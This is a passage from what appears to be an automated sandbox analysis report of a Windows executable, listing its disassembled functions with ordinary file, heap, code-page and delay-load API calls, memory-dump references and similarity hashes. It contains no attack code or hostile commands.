                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        • Opcode ID: c04c1e113dfe7f3db3b913f8df01ffc8c86ddbe639416a97addf96cb264519f4
                                                                                                                        • Instruction ID: 05090760c7141a0b8ad75d9487107283e0601de896feb710d50b4720d21bf3ca
                                                                                                                        • Opcode Fuzzy Hash: c04c1e113dfe7f3db3b913f8df01ffc8c86ddbe639416a97addf96cb264519f4
                                                                                                                        • Instruction Fuzzy Hash: 1DA011C2AA8202BC300822002E02C3F020EC0CBF28330B82EF80AA8280A8802C020830
                                                                                                                        Function 00EAE573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        • Opcode ID: d30211f9e827418dd1ca7b303c7354f278d191e01ea1b65cab86631881ea9f3d
                                                                                                                        • Instruction ID: 875d3769b0a1523c59d7a7c967156b9a3753bdee143811b4f9a38f3a8f0dbbe8
                                                                                                                        • Opcode Fuzzy Hash: d30211f9e827418dd1ca7b303c7354f278d191e01ea1b65cab86631881ea9f3d
                                                                                                                        • Instruction Fuzzy Hash: 02A011C2AA82003C300C22A02E02C3B020CC0CAF2A330BA2EF808B8280A88028020830
                                                                                                                        Function 00EAE541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        • Opcode ID: 8fb741f7bacdd1b1afa0352f2996305f507b63a49106165de4dfbfbfe8d6c2fa
                                                                                                                        • Instruction ID: 05090760c7141a0b8ad75d9487107283e0601de896feb710d50b4720d21bf3ca
                                                                                                                        • Opcode Fuzzy Hash: 8fb741f7bacdd1b1afa0352f2996305f507b63a49106165de4dfbfbfe8d6c2fa
                                                                                                                        • Instruction Fuzzy Hash: 1DA011C2AA8202BC300822002E02C3F020EC0CBF28330B82EF80AA8280A8802C020830
                                                                                                                        Function 00EAE55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        • Opcode ID: c5ff0de328ac4d2df8c809d5a8ef64702a9d7b476bd9e3410c80ffe9d46a8357
                                                                                                                        • Instruction ID: 05090760c7141a0b8ad75d9487107283e0601de896feb710d50b4720d21bf3ca
                                                                                                                        • Opcode Fuzzy Hash: c5ff0de328ac4d2df8c809d5a8ef64702a9d7b476bd9e3410c80ffe9d46a8357
                                                                                                                        • Instruction Fuzzy Hash: 1DA011C2AA8202BC300822002E02C3F020EC0CBF28330B82EF80AA8280A8802C020830
                                                                                                                        Function 00EAE555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        • Opcode ID: 63b2f47d49bf603b3418728d5cd8c6197ad02118066f96d4f9dbaa9cf1c1900c
                                                                                                                        • Instruction ID: 05090760c7141a0b8ad75d9487107283e0601de896feb710d50b4720d21bf3ca
                                                                                                                        • Opcode Fuzzy Hash: 63b2f47d49bf603b3418728d5cd8c6197ad02118066f96d4f9dbaa9cf1c1900c
                                                                                                                        • Instruction Fuzzy Hash: 1DA011C2AA8202BC300822002E02C3F020EC0CBF28330B82EF80AA8280A8802C020830
                                                                                                                        Function 00EBBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EBB7BB: GetOEMCP.KERNEL32(00000000,?,?,00EBBA44,?), ref: 00EBB7E6
                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00EBBA89,?,00000000), ref: 00EBBC64
                                                                                                                        • GetCPInfo.KERNEL32(00000000,00EBBA89,?,?,?,00EBBA89,?,00000000), ref: 00EBBC77
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 546120528-0
                                                                                                                        • Opcode ID: 8b1e7184591fddef8ddfc0cfb4d5fcaec5a57d2df6c601967931649164bca6c6
                                                                                                                        • Instruction ID: 4cc01e5cb8ba0094e96a9366105084195b099946aa195cd5f3e5be21d7463316
                                                                                                                        • Opcode Fuzzy Hash: 8b1e7184591fddef8ddfc0cfb4d5fcaec5a57d2df6c601967931649164bca6c6
                                                                                                                        • Instruction Fuzzy Hash: 1F515670A002059EDB20CF72C881AFBFBF4EF41304F28646ED496BB251D7B99946CB90
                                                                                                                        Function 00E99A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00E99A50,?,?,00000000,?,?,00E98CBC,?), ref: 00E99BAB
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00E98411,-00009570,00000000,000007F3), ref: 00E99BB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        • Opcode ID: 8fc9464f990506b24de9bc6d48636de5251950ad556acf460f535a5bed68fb0b
                                                                                                                        • Instruction ID: 7b189b0ff6c95a5ca5d4e8defffb4801827252757ae873b42a2282d3e413f437
                                                                                                                        • Opcode Fuzzy Hash: 8fc9464f990506b24de9bc6d48636de5251950ad556acf460f535a5bed68fb0b
                                                                                                                        • Instruction Fuzzy Hash: D941E1716043018FDF24DF2DE58486EB7E5FFD4324F149A2DE881A3262E7B8EC458A59
                                                                                                                        Function 00E91E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E91E55
                                                                                                                          • Part of subcall function 00E93BBA: __EH_prolog.LIBCMT ref: 00E93BBF
                                                                                                                        • _wcslen.LIBCMT ref: 00E91EFD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2838827086-0
                                                                                                                        • Opcode ID: 08ff9c7d469ac3462e07043ae1b28f11641c92d492f81692fe907f51cbbc8e80
                                                                                                                        • Instruction ID: 67dd4c7dd36445fd5a52fc37b30c5927be1bfe4995e967e31c040cb48f364bde
                                                                                                                        • Opcode Fuzzy Hash: 08ff9c7d469ac3462e07043ae1b28f11641c92d492f81692fe907f51cbbc8e80
                                                                                                                        • Instruction Fuzzy Hash: 7531287190420AAFCF15DFA8C945AEEBBF6AF49304F1014AAF845B7251CB329E51CB60
                                                                                                                        Function 00E99DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E973BC,?,?,?,00000000), ref: 00E99DBC
                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E99E70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$BuffersFlushTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1392018926-0
                                                                                                                        • Opcode ID: abb3091ed6da9309aad6e02cd9b49024f02316556e3fcd17af38ef780745ffbc
                                                                                                                        • Instruction ID: 0c963efe94fa705d8837e27094d90bed13174c90950d8214e6042442d7987b2d
                                                                                                                        • Opcode Fuzzy Hash: abb3091ed6da9309aad6e02cd9b49024f02316556e3fcd17af38ef780745ffbc
                                                                                                                        • Instruction Fuzzy Hash: CF212332248345AFCB14CF38C892AABBBE4AF56308F08581CF4C597542D339E90DCB62
                                                                                                                        Function 00E9966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00E99F27,?,?,00E9771A), ref: 00E996E6
                                                                                                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00E99F27,?,?,00E9771A), ref: 00E99716
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: a2f5a4c098c26e005f3e3048a82985c2c0feafbd5a95e5e3d25babf7a794c597
                                                                                                                        • Instruction ID: 84d74617a1acd09142a805ca47892f1ac956e51f04a5e2e7caaea73313a0b621
                                                                                                                        • Opcode Fuzzy Hash: a2f5a4c098c26e005f3e3048a82985c2c0feafbd5a95e5e3d25babf7a794c597
                                                                                                                        • Instruction Fuzzy Hash: 9121CFB1500344AFE7308A69CC89FE7B7DCEB49328F105A1DFA95E65D3C774A8848631
                                                                                                                        Function 00E99E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00E99EC7
                                                                                                                        • GetLastError.KERNEL32 ref: 00E99ED4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        • Opcode ID: cf7738bf655bb7b6e66131fa2e3ae4a164cde57d695fbec2d796c61e2569c52b
                                                                                                                        • Instruction ID: 06f88ca5452c2921a1da4eb858c9cedd94e8af06d11eeb826477505d2dac9fa8
                                                                                                                        • Opcode Fuzzy Hash: cf7738bf655bb7b6e66131fa2e3ae4a164cde57d695fbec2d796c61e2569c52b
                                                                                                                        • Instruction Fuzzy Hash: 7B11E531600700ABDF24D63DC841BA6B7E9AB44364F505A2EE162F26D1D770ED4AC760
                                                                                                                        Function 00EB8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00EB8E75
                                                                                                                          • Part of subcall function 00EB8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EBCA2C,00000000,?,00EB6CBE,?,00000008,?,00EB91E0,?,?,?), ref: 00EB8E38
                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00ED1098,00E917CE,?,?,00000007,?,?,?,00E913D6,?,00000000), ref: 00EB8EB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocAllocate_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2447670028-0
                                                                                                                        • Opcode ID: c5fad613b7a8f88b67273cf2ddc112af95488cf465f1a323315ae198fbe015f5
                                                                                                                        • Instruction ID: a0f8a6b64112e74f85e864b09d3d849faaaba90ccdab51bd6cf7e898097accce
                                                                                                                        • Opcode Fuzzy Hash: c5fad613b7a8f88b67273cf2ddc112af95488cf465f1a323315ae198fbe015f5
                                                                                                                        • Instruction Fuzzy Hash: 81F0F6322011026ACB222A26AE05FEF379C8FC1B70F256126F914BA391DF71DD00C5A0
                                                                                                                        Function 00EA109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 00EA10AB
                                                                                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 00EA10B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1231390398-0
                                                                                                                        • Opcode ID: 86ea39d4965f133afe260757c70ec4195452c637c77ed0aa513d1b6030cc6191
                                                                                                                        • Instruction ID: d5bf00502b10cbba6d49adfaf5269838fcf3b72ef425179d6259f533cb15b74e
                                                                                                                        • Opcode Fuzzy Hash: 86ea39d4965f133afe260757c70ec4195452c637c77ed0aa513d1b6030cc6191
                                                                                                                        • Instruction Fuzzy Hash: 15E0D833B00145ABCF0987B59C458EB77DDEB49208B1491B5E413FB101F930FE464760
                                                                                                                        Function 00E9A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A501
                                                                                                                          • Part of subcall function 00E9BB03: _wcslen.LIBCMT ref: 00E9BB27
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A532
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2673547680-0
                                                                                                                        • Opcode ID: d23b99859e8ed9b28173ad3e7773d8a0d468d321a86592b91f81acd427fb4fb6
                                                                                                                        • Instruction ID: b9322403873332dd7cd3fcf1864fa866e1cb011ac489285f54724fb0a609d1d3
                                                                                                                        • Opcode Fuzzy Hash: d23b99859e8ed9b28173ad3e7773d8a0d468d321a86592b91f81acd427fb4fb6
                                                                                                                        • Instruction Fuzzy Hash: 3BF03032240149BBDF016F61DC45FDA37ACBF04385F488061BD45F5160DB71DA99DA50
                                                                                                                        Function 00E9A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNELBASE(000000FF,?,?,00E9977F,?,?,00E995CF,?,?,?,?,?,00EC2641,000000FF), ref: 00E9A1F1
                                                                                                                          • Part of subcall function 00E9BB03: _wcslen.LIBCMT ref: 00E9BB27
                                                                                                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E9977F,?,?,00E995CF,?,?,?,?,?,00EC2641), ref: 00E9A21F
                                                                                                                        Memory Dump Source
